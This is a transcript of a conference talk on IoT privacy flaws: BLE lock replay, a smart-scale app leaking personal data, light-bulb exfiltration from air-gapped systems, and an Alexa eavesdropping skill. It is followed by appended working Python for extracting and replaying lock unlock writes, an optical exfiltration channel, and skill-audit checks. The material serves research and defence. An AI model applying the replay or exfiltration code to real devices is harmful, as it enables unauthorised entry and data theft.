IoT VILLAGE - Your Smart Scale is Leaking More than Your Weight

Video in TIB AV-Portal: IoT VILLAGE - Your Smart Scale is Leaking More than Your Weight

Formal Metadata

IoT VILLAGE - Your Smart Scale is Leaking More than Your Weight
Privacy Issues in IoT
Title of Series
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Release Date

Content Metadata

Subject Area
Cheaper devices that consume less power: what more can you ask for? Security! Based on multiple tests we have done across a variety of devices, we can conclude that there are still many vendors who lack security awareness and fail to protect their users. All tested devices were vulnerable to various degrees: a smart scale, a smart lock, a smart band, a smart light bulb and even Amazon's Alexa. Live demos included!
For those of you who attended the last talk: mine is not going to be that low-level; it's going to be like poetry compared to it. I'm here to discuss privacy issues in IoT, to see what privacy issues look like, and hopefully to bring some awareness to that and send you out with the knowledge. So let's start. The left one is me.

[Music] Another guy who worked with me on the research, his name is David Sopas, a very talented man, follow him on Twitter. We both work at Checkmarx; I'm the head of AppSec research at Checkmarx. These are my details to contact me if you have any questions after the talk; if you want to connect, I'd be more than happy to do that. I know some people don't like to ask questions in a crowd, so this is a good way to catch me.

Okay, so I'm starting with some assumptions. I'm assuming you're familiar with the basics of Bluetooth and BLE, and I'm assuming you're familiar with the attacks on these kinds of technologies. I'm assuming you're going to be cool with the oversimplifications that I'm going to make: we don't have time to talk about every single thing, so I'm going to lie a bit. And I'm assuming you will want some links to the tools and methodologies that I'm going to show, because I'm not going to discuss them in depth, just show them. So I promised to publish everything that you will need.

So let's start with the agenda. I'm going to describe a bit of privacy: what it is and what it is good for. We'll show some IoT privacy leaks that are the result of bad implementations; we'll do the same with the malicious intent of thieves and vendors; we'll talk about one very nice privacy leak we made with a high-end IoT device (spoiler: Amazon Alexa, the Echo Dot), and I'm saying that so you'll stay; and some takeaways.
So let's talk about privacy. We always start with a good book, Wikipedia, to describe things. So privacy is the ability of an individual or group to seclude themselves, or information about themselves, and thereby express themselves selectively. There are some points in there that are very important to privacy. One of them is the right to be let alone; yes, it is a thing. The option to limit access to information, to private information: secrecy. Control over information about oneself; obviously about oneself, about where you walk, or your employees' information as well, etc.

So what are the reasons that people have, vendors, developers, legitimate or not, to take one's privacy? First is security: if I tell you that one of you is a terrorist and I need to check each and every one of you, this is a good reason to do that. Maybe to get something physical: if I can break into your house or any other private place you have, I can steal things, take things, get private information. There are a few aspects of private information that I can gain from getting your personal information; it's worth a lot of money, as we know these days. Maybe some information about organizations, behavior analysis; all of these are worth money. And also sometimes because I lack the interest in actually making sure that your privacy is kept. I think this is one of the most common issues, actually.

What does it take for a person to forfeit his privacy? Again security, at the top place: people believe that letting themselves be groped at the airport means that the flight will be okay. Then they argue with sentences like "I have nothing to hide"; I'm sure you've heard it from people. Try to ask these people some personal questions, like mother's maiden name, date of birth and their sexual preferences, and you'll see that suddenly they do have stuff to hide. Sometimes laziness: I don't care, I don't read what I'm clicking on, it doesn't really matter. Ignorance, from people who don't really know what they might lose. And the most terrible of all, convenience: if I can let Google know where I'm going and just wait for them to let me know where I should eat, or what I should pack in my suitcase, then I'm willing to forfeit my privacy.

And then comes IoT and breaks everything, because it has all the reasons to take one's privacy and all the reasons to forfeit one's privacy. And obviously, lack of interest on the side of the vendors and convenience on the side of the users is a really, really bad combination.

So what we did: we gathered a lot of IoT devices. Some are really ridiculous; here on top you can see a Bluetooth pacifier, I kid you not, people are putting Bluetooth in their babies' mouths now. Every single device had a privacy issue, again, every single device; we did not manage to find even one device lacking any problems. Cheap ones, expensive ones, no matter where they were manufactured, made in the US, made in China, all the same, every single device. This is a scary thing.
Let's start with physical security: a lock, a Bluetooth lock. They come in many shapes and sizes, and none of them stays closed, none of them, and that's amazing. First of all, if I were going to hack this thing it would probably be with pliers, but still, people want to use it for small things. I guess it's the same with houses.

The two really effective ways to break a smart lock. HCI snooping is, I think, how most of the locks actually broke; it's a really easy method, easy as 1-2-3: you enable the HCI log on your phone, you use the application that's supposed to open the lock, you extract the relevant data using pcap/Wireshark, and then you use a script to replay or fuzz. Extremely easy. Again, this is how you use HCI: run the application and then look at the pcap files. In this case you can immediately see, well, maybe you can't, but I can see that the code is a six-digit number, obviously very easily fuzzed. Like in this example: here it is locked, and here it is not, and this is the time it takes, not more than that, for almost all the locks we checked.

So for those where this method did not work we actually had to work a bit harder; we used a man-in-the-middle attack. I tried to make a live demo of it, but the atmosphere here is too much for it, so it really didn't work, so we'll just keep it at that. You run a proxy between the device and the lock, extract the relevant data, replay, and the lock opens.
You remember the right to be let alone, that nice part of privacy? This is not something you can do if you have this kind of a smart band. A no-name smart band; we tried several of those. Again, it will not let you alone. Again, faking messages using the same methods. It's really scary, it's really scary; I'm just faking a message, that's it, nothing more than that.

So why is it so easy? Why is it so easy? Well, two things, two reasons. One is lack of encryption in IoT. BLE device vendors either do not implement encryption at all, or they use deprecated methods, or they use them wrong. Encryption is sometimes complicated, but if you don't care it makes it even more complicated. This really allows you to sniff easily, either passively or by doing a man-in-the-middle attack. The second thing is using very weak pairing methods, methods like Just Works and Passkey; read about it, it's really deprecated, it's really old, there are way better methods these days that should be used. So why not make it better? Again, it's cheaper: I don't need to change anything, I've had the same software for four years now; if it's cheaper I can sell more. Vendors come and go very quickly; some of them don't really have names, just imaginary names, zero liability, and people keep buying anyway no matter what, so why bother?
So this is when you implement in a negligent way. What about malicious? Actually, this was kind of surprising, because we didn't really aim at finding something like that; we thought that just bad implementation is what we were going to see all over the place. And then we took a smart scale by AEG. The reason we took a smart scale by AEG is because we tried to get serious, and not always the no-name IoT devices that we used before. AEG is German, nothing more serious than that; also it came in white or black, we took the black, very serious. So the scale was AEG, but the app that came with it, not so much; it wasn't by AEG. The app was by someone called VTrump, a Chinese company; among their clients are AEG, Texas Instruments and Realtek. Seems legit, nothing to suspect, and we didn't. So we started by installing the app like any other user who needs to check his weight, maybe, sometimes, and then we got all these permissions, all these "needed" permissions. It's not that bad; I mean, it's a bit weird that a smart scale would need to be able to mount and unmount file systems. Maybe we started to kind of suspect, but we kind of understood what was going on.

When checking the traffic, first of all, they didn't really try to hide anything, because the host, I don't know if you can see it, is called gather dot [something] dot com; they actually gather things. And then it was pretty horrible to notice that the app connects to a server in China and sends the following info: IMEI, Wi-Fi ID, phone operator, phone brand and model, the Wi-Fi of your house and the phone's MAC address, latitude, longitude, and obviously your weight; that's just to make it insulting, after all the data. So it's not a mistake, this is not negligent, right? You actually did a lot of work to gather all this information.

So we tried to get responses from all the previous devices. We didn't manage to get any response, because I don't think they're real companies, so just skip that part. But here we did have real companies, right, AEG and VTrump. So AEG said they react to products with priority whenever they believe it is necessary. I think they didn't believe it was necessary, because I could never manage to contact them again or get any response, so this is the response we were left with. VTrump, on the other hand, said their app functionality does require these permissions. I mean, they ignored completely the second part, all the information that is sent; they only talked about the permissions, and obviously they decided not to change anything, and this is what they told us. But they did make some changes, just a little before this lecture; we checked again, and they made changes. First of all, they changed the host, so it's not gather-something-something dot com any more, it's now just a bunch of characters dot com. The second thing they did is they added encryption, so it's actually mitigating the penetration testers, it's mitigating the researchers, because they didn't want us to see what they're sending. They did it really badly, and we did check: they are actually sending the same thing. Not that important, and this is an AEG, something you would probably think you should trust.
Let's go a bit higher level, towards not personal but maybe corporate, military, whatever other uses: exfiltration. So everyone knows what an air gap is? Everyone who knows what an air gap is, please raise your hand. Okay, that's quite an amount. So an air gap is being used for highly sensitive data; it's disconnected from outside networks completely, supposed to be completely disconnected. Things can get in, no problem; it's an assumption that some viruses or malware will go into the system, and that's, let's say, not okay but it's okay, but nothing gets out. So no matter what, nothing gets out, unless you're using a six-fifty smart light bulb in your building, basement, whatever.

What we did here: on the left side you can see... well, let's start on the right side. On the right side you see a simulation of the computer which has, let's say, a valuable virus, and this virus, well, it found out that there is a smart light bulb somewhere in the vicinity, connects to it, and starts exfiltrating data through the blinking of the light bulb. That's it. On the left you can see the app we did for Android that will start gathering the blinks and make them into letters. It's very sterile here because it's just aimed at the wall, at a white wall; I don't know why it's blue, but it's a white wall, believe me. We actually tested it from a distance of 100 meters with a telescope during daylight, to a window; it also works. You can see it start blinking and soon you can start interpreting the data; as you can see, just ones and zeroes, nothing fancy. Some of you probably say it's not really effective, because the victim actually sits in the room and the light blinks, he should suspect something. Sometimes we actually do the same thing with only blue-wave lights; it cannot be seen by the eye, but every camera catches it. Obviously we can do it multi-layer, with several colors, if you want a wider bandwidth, but this is enough for the POC. And it was kind of funny to do something with a telescope during the daylight, and we didn't look crazy at all, by the way, doing it.
Okay, so the same person who said "yeah, but the light is blinking" is also saying "yeah, but these are all just cheap, crappy devices", and he's right. So we tried something else: we went for Alexa, and we went for Alexa because it's the least cheap, least crappy device we could find. The Amazon Echo is the most sold intelligent personal assistant; by the end of 2017, 45 million units were sold, and I'm pretty sure some more since then. Popularity rose in the last years, and so did the fear of being recorded or listened to unknowingly, and we wanted to show that the fear is totally justified. So we started checking it.

What we wanted was to turn our Echo Dot into a tapping device. We're coming from application security, so we don't like soldering, and we don't like, I don't know, some dirt on our hands, so we decided to do it remotely. We thought it would be easier for us, because I think that in the last couple of years a couple of groups managed to do some hacks and cracks by actually having contact with the Echo, so we tried to do something remotely.

The first challenge was actually the activation challenge, because Alexa is asleep until you wake her up; she only starts streaming audio to the cloud after the wake-up word "Alexa" is heard. This is something that is very hard to do remotely, unless you shout really hard. So our solution was to start after the user wakes her up, which usually happens several times a day, I guess, for users. We had several options for how to do that; not to go into it very deeply, we decided to use Alexa skills. An Alexa skill is like an application that is run by Alexa; it can be either built-in or you can download it from a dedicated Alexa store. And we thought it would be really nice to create a malicious one, something that starts benign, like a calculator that you ask how much is 1+1, and you get the answer and you don't suspect anything, but Alexa will then continue to record you. So this was the grand plan.

The second challenge came quite quickly, because we couldn't keep the session alive after the benign part. So Alexa gives the answer and then she goes to sleep again, she shuts down, or if you tell her to stay she prompts the user. So the partial solution: a flag that we found, I mean, it's a normal flag, it's called shouldEndSession; if you indicate that you should not end the session, then Alexa goes into another cycle, another session, but Alexa will prompt the user that she's again waiting for a response. So this is kind of problematic, because the users of Alexa are very smart and they will know that something is going on.

So the complete solution came from a class that is called reprompt. We said: what if we try and put an empty string in the reprompt? Well, complete silence. So that was pretty cool; we managed to keep the sessions coming without Alexa saying anything to the user. So that was the first challenge, that was the second challenge, and the third challenge was to actually get the data to the malicious developer. The actual recording is not accessible to the developers; it's uploaded to the cloud, but the transcription generated by Amazon is accessible. Usually the developer needs to choose a specific group of words, which they call a word slot; for example, if you put cities, Alexa expects to get some sort of city name in your mumblings; names, animals, you get the gist. So our solution was to create a custom word slot that will get everything, whatever is said; Alexa will try to guess what is the closest word to it. And we actually created a custom one, we called it "input", and this word slot would capture any single word. But we wanted sentences, not single words, because if the user says a single word and then goes to another cycle, then we probably missed the ten words in the sentence. So we actually created templates for different sentences, with all the lengths of sentence we could think of; we could think of 15, I don't know why, maybe you have a bigger vocabulary and you can make sentences of more than 15 words, we couldn't. So every sentence that is no more than 15 words will be captured by Alexa, transcribed, and sent to the malicious user. Okay, so I'll give a link to the demo later, sorry about that.

[Applause] Very proud. Okay, so that guy from before, from earlier, who pointed out things, he is probably saying now: what about the blue light? The blue light is on all the time, and he's right, but it doesn't matter much. Actually we thought it lowered the effectiveness of the attack, of the malicious app, but Amazon didn't think so. Amazon thought it still works, it's still bad, and they said that users of intelligent personal assistants are not expected to keep eye contact with the device, so the blue light is not expected to be there. Also, and this was actually news for us, there is something called Alexa Voice Services, which allows any vendor with some sort of IoT to embed Alexa capabilities into their, probably lightless, products; if I make a teapot or a refrigerator with Alexa inside it, I don't have to put any light. So this does not lower the risk here. Amazon's response, and they asked that we read it: "Customer trust is important to us and we take security and privacy seriously. We have put mitigations in place for detecting this type of skill behavior reported by Checkmarx." This came from the security team at Lab126 in Amazon. Actually it was amazing working with these guys; they gave us very rapid responses, we collaborated with them the entire way with the fixes, and they decided to make the following mitigations: detect and disallow empty reprompts, there's no use for that feature; identify eavesdropping skills that are uploaded to the store, and they didn't really give us more details but obviously they're on it; and detect longer-than-usual sessions and act appropriately. So this is kind of great.
A quick round of takeaways, and I'm sorry if I'm getting a bit preachy, but it's important. So it's very easy to forget that IoT devices are actually computers which have inputs and outputs, cameras, ears and eyes, whatever. Really, users, normal users, everyday users, do not really think that there may be a privacy breach in stuff they wear all the time. The breaches, as we said, sometimes it's because the device sucks, sometimes it's because it's malicious, but always because the users allow it. So privacy issues are a layer 8 problem; only users can solve it, by making sure that they buy only trusted devices, by making it very clear to the vendors that vulnerable devices will stay on the shelves, and by making it very clear to vendors that found vulnerabilities must be fixed quickly. Your job, I suppose: write it down, talk to users, please talk to vendors if it's possible, educate and bring awareness. Privacy issues are a really big problem. Break as many IoT devices as possible and publish your findings, no matter how small they are. Awareness, please. And that's it.
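The "extract relevant data" step of the lock replay described in the talk (enable the HCI log, drive the app, pull the write out of the capture, replay it), as an added example that is not the speakers' own tooling. It parses Android's btsnoop_hci.log format (big-endian record headers, H4-framed HCI packets) and pulls out every ATT Write Request/Command the phone sent, which is where a lock's unlock code shows up. The sample log is constructed in `build_sample_log()`; the 6-digit code, the attribute handle 0x0011 and the connection handle are made up for the example. `replay_command()` only formats the BlueZ gatttool invocation; it does not send anything.

```python
"""Pull the ATT writes an app sent to a BLE device out of an Android HCI snoop log.

btsnoop layout: 8-byte magic, version (u32), datalink (u32), then records of
orig_len, incl_len, flags, drops (u32 each), timestamp (i64) and the packet;
all header fields are big-endian. flags bit0: 0 = sent by host, 1 = received."""
import struct

BTSNOOP_MAGIC = b"btsnoop\x00"
DATALINK_H4 = 1002          # HCI UART (H4) framing, what Android's btsnoop_hci.log uses
H4_ACL = 0x02
ATT_CID = 0x0004
ATT_WRITE_REQ, ATT_WRITE_CMD = 0x12, 0x52


def iter_btsnoop_records(data):
    """Yield (timestamp, flags, h4_packet) for each record in a btsnoop file."""
    if data[:8] != BTSNOOP_MAGIC:
        raise ValueError("not a btsnoop file")
    version, datalink = struct.unpack(">II", data[8:16])
    if version != 1 or datalink != DATALINK_H4:
        raise ValueError(f"unsupported btsnoop version/datalink {version}/{datalink}")
    off = 16
    while off + 24 <= len(data):
        _orig, incl, flags, _drops, ts = struct.unpack(">IIIIq", data[off:off + 24])
        off += 24
        yield ts, flags, data[off:off + incl]
        off += incl


def extract_att_writes(data):
    """Return the ATT Write Request/Command PDUs the host (the phone app) sent."""
    writes = []
    for ts, flags, pkt in iter_btsnoop_records(data):
        if flags & 0x1 or not pkt or pkt[0] != H4_ACL or len(pkt) < 9:
            continue                                    # received, or not ACL data
        hdl, _acl_len = struct.unpack("<HH", pkt[1:5])  # ACL: handle|PB|BC, length
        if (hdl >> 12) & 0x3 == 0x1:
            continue                                    # continuation fragment: no L2CAP header
        l2_len, cid = struct.unpack("<HH", pkt[5:9])
        att = pkt[9:9 + l2_len]
        if cid != ATT_CID or len(att) < 3 or att[0] not in (ATT_WRITE_REQ, ATT_WRITE_CMD):
            continue
        writes.append({"ts": ts, "conn": hdl & 0x0FFF, "opcode": att[0],
                       "handle": struct.unpack("<H", att[1:3])[0], "value": att[3:]})
    return writes


def replay_command(bdaddr, write):
    """gatttool command line that re-sends one captured write (BlueZ gatttool flags)."""
    flag = "--char-write-req" if write["opcode"] == ATT_WRITE_REQ else "--char-write"
    return f"gatttool -b {bdaddr} {flag} -a 0x{write['handle']:04x} -n {write['value'].hex()}"


def _att_write_packet(conn, handle, value, opcode=ATT_WRITE_REQ):
    att = bytes([opcode]) + struct.pack("<H", handle) + value
    l2cap = struct.pack("<HH", len(att), ATT_CID) + att
    return bytes([H4_ACL]) + struct.pack("<HH", conn, len(l2cap)) + l2cap   # PB=00: first fragment


def _record(pkt, flags, ts=0):
    return struct.pack(">IIIIq", len(pkt), len(pkt), flags, 0, ts) + pkt


def build_sample_log():
    """Constructed log, not a real capture: one HCI command, the app writing a
    6-digit code to handle 0x0011, and a notification coming back from the lock."""
    cmd = bytes([0x01, 0x0C, 0x20, 0x02, 0x01, 0x00])            # LE Set Scan Enable
    code = _att_write_packet(0x0040, 0x0011, b"123456")
    notif = (bytes([H4_ACL]) + struct.pack("<HH", 0x0040, 7)
             + struct.pack("<HH", 3, ATT_CID) + bytes([0x1B, 0x13, 0x00]))  # Handle Value Notification
    return (BTSNOOP_MAGIC + struct.pack(">II", 1, DATALINK_H4)
            + _record(cmd, flags=0b10, ts=1) + _record(code, flags=0b00, ts=2)
            + _record(notif, flags=0b01, ts=3))


if __name__ == "__main__":
    for w in extract_att_writes(build_sample_log()):
        print(f"conn 0x{w['conn']:04x} handle 0x{w['handle']:04x} value {w['value']!r}")
        print(replay_command("AA:BB:CC:DD:EE:FF", w))
```

On a real capture, run `extract_att_writes(open("btsnoop_hci.log", "rb").read())` and look at which handle the app writes to right after you press "unlock" in the app; a value that changes between runs but stays within a small space (six ASCII digits, as in the talk) is what the fuzzing step iterates over. Encrypted links show up here as LE-encrypted ACL data that no longer parses as L2CAP/ATT, which is exactly the point the talk makes about missing encryption.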
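The light-bulb exfiltration channel (the virus blinks a bulb, an Android app on a camera turns the blinks back into letters), as an added example that is not the speakers' PoC. The framing (a SYNC pattern, a length byte, a CRC-8) and the Manchester chip encoding are this example's own choices, picked so the receiver can recover the bit clock and reject frames damaged by flicker or motion; `camera_samples()` stands in for the camera with constructed noisy brightness readings. The multi-colour and blue-only variants mentioned in the talk are not modelled.

```python
"""Optical covert channel: on-off keying of a light, decoded from brightness samples."""
import random

SYNC = bytes([0xAA, 0xAA, 0x7E])   # alternating bits to lock the clock, then a marker


def crc8(data, poly=0x07):
    """CRC-8 (poly 0x07, init 0, no reflection); check value for b'123456789' is 0xF4."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = ((crc << 1) ^ poly) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc


def _bits(data):
    return [(byte >> i) & 1 for byte in data for i in range(7, -1, -1)]


def _bytes(bits):
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))


def build_frame(payload):
    body = bytes([len(payload)]) + payload
    return SYNC + body + bytes([crc8(body)])


def manchester(bits):
    """Each bit becomes two chips (light on/off): 1 -> on,off   0 -> off,on."""
    return [chip for bit in bits for chip in ((1, 0) if bit else (0, 1))]


def transmit(payload, idle=5):
    """Chip sequence the bulb would blink: dark idle, the frame, dark idle."""
    if len(payload) > 255:
        raise ValueError("payload too long for a one-byte length field")
    return [0] * idle + manchester(_bits(build_frame(payload))) + [0] * idle


def camera_samples(chips, oversample=4, bright=220, dark=30, jitter=25, seed=1):
    """Constructed camera readings: `oversample` noisy brightness samples per chip."""
    rng = random.Random(seed)
    return [max(0, min(255, (bright if chip else dark) + rng.randint(-jitter, jitter)))
            for chip in chips for _ in range(oversample)]


def _chips_to_bits(chips, phase):
    out = []
    for i in range(phase, len(chips) - 1, 2):
        pair = (chips[i], chips[i + 1])
        out.append(1 if pair == (1, 0) else 0 if pair == (0, 1) else None)
    return out


def decode_samples(samples, oversample=4):
    """Threshold, majority-vote each chip, try both Manchester phases, locate SYNC,
    verify the CRC. Returns the payload, or None if no intact frame is present."""
    threshold = (max(samples) + min(samples)) / 2
    chips = [1 if sum(s > threshold for s in samples[i:i + oversample]) * 2 > oversample else 0
             for i in range(0, len(samples) - oversample + 1, oversample)]
    sync = _bits(SYNC)
    for phase in (0, 1):
        bits = _chips_to_bits(chips, phase)
        for start in range(len(bits) - len(sync) + 1):
            if bits[start:start + len(sync)] != sync:
                continue
            rest = bits[start + len(sync):]
            if len(rest) < 8 or None in rest[:8]:
                break
            length = _bytes(rest[:8])[0]
            frame = rest[8:8 + 8 * (length + 1)]           # payload bits + CRC bits
            if len(frame) < 8 * (length + 1) or None in frame:
                break
            body = bytes([length]) + _bytes(frame[:8 * length])
            if crc8(body) == _bytes(frame[8 * length:])[0]:
                return body[1:]
            break                                           # damaged frame at this sync
    return None


if __name__ == "__main__":
    print(decode_samples(camera_samples(transmit(b"secret"))))
```

At a few chips per second this is slow, which is why the talk is happy with ones and zeroes for a POC; the defensive observation is the same one the talk makes: a bulb on the building network is an output device, and an air gap that ignores it is not an air gap.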
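The three building blocks of the Alexa eavesdropping skill (keep the session open with `shouldEndSession: false`, silence the prompt with an empty `reprompt`, and catch arbitrary speech with a custom slot used in utterances of 1 to 15 words), written as checks a reviewer could run over a skill's responses and interaction model. This is an added example, not the speakers' skill or Amazon's detection code: the response and interaction-model JSON follow the Alexa Skills Kit custom-skill format, but the `MAX_SILENT_TURNS` threshold, the sample model and the intent names are constructed for the example, and Amazon's real limits are not public.

```python
"""Checks for the skill behaviours the talk describes: a silent reprompt that keeps
the session open, a catch-all custom slot, and longer-than-usual sessions."""
import re
from collections import defaultdict

MAX_SILENT_TURNS = 3    # constructed threshold for the session monitor


def build_response(speech, end_session, reprompt=None):
    """Build an Alexa custom-skill JSON response (version 1.0 format)."""
    resp = {"version": "1.0",
            "response": {"outputSpeech": {"type": "PlainText", "text": speech},
                         "shouldEndSession": end_session}}
    if reprompt is not None:
        resp["response"]["reprompt"] = {"outputSpeech": {"type": "PlainText", "text": reprompt}}
    return resp


def _spoken_text(output_speech):
    """Text the device would actually say; SSML tags are stripped so <speak/> counts as empty."""
    if not output_speech:
        return ""
    if output_speech.get("type") == "SSML":
        return re.sub(r"<[^>]+>", "", output_speech.get("ssml", ""))
    return output_speech.get("text", "")


def audit_response(resp):
    """Findings for one response: an open session that gives the user no audible cue."""
    findings = []
    r = resp.get("response", {})
    if r.get("shouldEndSession") is not False:
        return findings                       # session ends; nothing is kept open
    reprompt = r.get("reprompt", {}).get("outputSpeech")
    if reprompt is None:
        findings.append("session kept open with no reprompt")
    elif not _spoken_text(reprompt).strip():
        findings.append("session kept open with an empty (silent) reprompt")
    return findings


def catch_all_utterances(model):
    """Sample utterances made only of slot references, e.g. '{input} {input} {input}'."""
    hits = []
    for intent in model["interactionModel"]["languageModel"]["intents"]:
        for sample in intent.get("samples", []):
            if sample.strip() and re.fullmatch(r"(\{\w+\}\s*)+", sample.strip()):
                hits.append((intent["name"], sample))
    return hits


class SessionMonitor:
    """Count consecutive silent, open-ended turns per session (the 'longer than
    usual session' signal); observe() returns True once the threshold is reached."""

    def __init__(self, max_silent=MAX_SILENT_TURNS):
        self.max_silent = max_silent
        self.silent = defaultdict(int)

    def observe(self, session_id, resp):
        self.silent[session_id] = self.silent[session_id] + 1 if audit_response(resp) else 0
        return self.silent[session_id] >= self.max_silent


def eavesdrop_model(max_words=15):
    """Constructed interaction model mirroring the talk: a benign calculator intent plus a
    capture intent whose utterances are 1..max_words repetitions of the custom slot 'input'."""
    return {"interactionModel": {"languageModel": {
        "invocationName": "quick calc",
        "intents": [
            {"name": "AddIntent", "slots": [], "samples": ["how much is one plus one"]},
            {"name": "CaptureIntent",
             "slots": [{"name": "input", "type": "INPUT"}],
             "samples": [" ".join(["{input}"] * n) for n in range(1, max_words + 1)]}],
        "types": [{"name": "INPUT",
                   "values": [{"name": {"value": w}} for w in ("the", "a", "and")]}]}}}


if __name__ == "__main__":
    print(audit_response(build_response("two", False, "")))
    print(len(catch_all_utterances(eavesdrop_model())), "catch-all utterances")
```

The benign calculator answer would be `build_response("two", True)`, which audits clean; the talk's trick is the second call shape, `build_response("two", False, "")`, which keeps the microphone open with nothing for the user to hear. The three checks map onto the three mitigations Amazon listed: refusing empty reprompts, flagging catch-all interaction models at store submission, and cutting off sessions that stay open too long.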